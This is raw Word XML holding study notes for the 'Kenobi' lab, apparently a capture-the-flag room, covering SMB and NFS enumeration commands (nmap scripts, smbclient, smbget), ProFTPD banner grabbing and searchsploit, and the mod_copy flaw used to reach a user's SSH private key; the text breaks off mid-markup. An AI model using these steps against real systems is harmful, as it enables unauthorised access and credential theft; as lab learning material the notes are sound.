    <w:p w14:paraId="1EEAEE41" w14:textId="02088B7A" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7286E199" w14:textId="178EE358" w:rsidR="00C46EAF" w:rsidRPr="0084205E" w:rsidRDefault="00C46EAF" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>KENOBI</w:t>
      </w:r>
      <w:r w:rsidR="00675EBC" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – Enumerating Samba for shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140FBB6B" w14:textId="1EFF25A4" w:rsidR="00C46EAF" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Standard windows interoperability suite of programs for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D53D700" w14:textId="50D9A12D" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows end users to access and use files, printers, and other shared resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48091F74" w14:textId="6985EA94" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Network file system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51851AFD" w14:textId="675BE592" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Commonly based on common client/server protocol of Server Message Block (SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82FF82" w14:textId="2AB47807" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Without Samba, non-Windows machines would be isolated, even if on same network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686D7FA7" w14:textId="4A76E74F" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> for SMB shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94A3DB" w14:textId="3D43FBD8" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266EAC1F" w14:textId="7185B253" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p 445 –script=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smb-enum-shares.nse,smb-enum-users.nse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117182F" w14:textId="4DCDBA1E" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Two ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6869F85F" w14:textId="5D783E3A" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">139 – originally ran </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ontop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> of NetBIOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F815DA" w14:textId="03B872AC" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="004B2B72" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>445 – later versions, on top of TCP stack, allows internet use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5613DAF8" w14:textId="4D8832B8" w:rsidR="004B2B72" w:rsidRPr="0084205E" w:rsidRDefault="00A455A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Inspect found shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0E8BD1" w14:textId="0C7B08F3" w:rsidR="00A455A3" w:rsidRPr="0084205E" w:rsidRDefault="00A455A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> //&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;/anonymous”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713FE92C" w14:textId="2BBC5695" w:rsidR="00A455A3" w:rsidRPr="0084205E" w:rsidRDefault="00A455A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Recursive downloads of SMB shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73524959" w14:textId="1034C171" w:rsidR="00A455A3" w:rsidRPr="0084205E" w:rsidRDefault="00A455A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>smbget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -R smb://&lt;ip&gt;/anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EDC4EC" w14:textId="62FEC2D5" w:rsidR="00A455A3" w:rsidRPr="0084205E" w:rsidRDefault="00A455A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Find out information about SSH key generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62855A44" w14:textId="651F349F" w:rsidR="00A455A3" w:rsidRPr="0084205E" w:rsidRDefault="00A455A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> server info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793291BF" w14:textId="5323E91F" w:rsidR="00A455A3" w:rsidRPr="0084205E" w:rsidRDefault="00A455A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">” discovered during </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B337A9" w14:textId="6EB85220" w:rsidR="00A455A3" w:rsidRPr="0084205E" w:rsidRDefault="00A455A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Server converts remote procedure call (RPC) program numbers into universal addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30337B14" w14:textId="3E8958FA" w:rsidR="00A455A3" w:rsidRPr="0084205E" w:rsidRDefault="00A455A3" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">When started, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rpcbind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> is told what address is listening and the RPC program number it is prepared to serve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36275480" w14:textId="2E2FF351" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Port is access to network file system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009639C7" w14:textId="6DEF055B" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enumerate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17908BA4" w14:textId="2E0AD6F4" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -p 111 –script=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nfs-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ls,nfs</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-statfs,nfs-showmount</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E5087C" w14:textId="55208497" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Gain initial access with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ProFtpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B8B6CF8" w14:textId="5E743CA2" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Get version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ProFtpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> running using netcat to connect to the machine on the FTP port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46F83B" w14:textId="009B2C79" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Syntax: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>&gt; &lt;port discovered, usually 21&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C05BEC6" w14:textId="6FD60AB3" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to find exploits for a particular software version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0165577D" w14:textId="0489E26C" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Syntax: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>proftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &lt;version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C008C7" w14:textId="7C997D14" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>mod</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>_copy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> module” exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27605763" w14:textId="335CAEB1" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Mod_copy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> module implements SITE CPFR and SITE CPTO commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A685F6" w14:textId="759392F9" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Used to copy files/directories from one place to another on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A4C6C" w14:textId="7A38C8F4" w:rsidR="00AB3367" w:rsidRPr="0084205E" w:rsidRDefault="00AB3367" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8241C2" w14:textId="56E1A81B" w:rsidR="00483730" w:rsidRPr="0084205E" w:rsidRDefault="00483730" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Prior data pull shows username (/home/Kenobi/) and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> key generation (/home/Kenobi/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FB0507" w14:textId="1304F206" w:rsidR="00483730" w:rsidRPr="0084205E" w:rsidRDefault="00483730" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
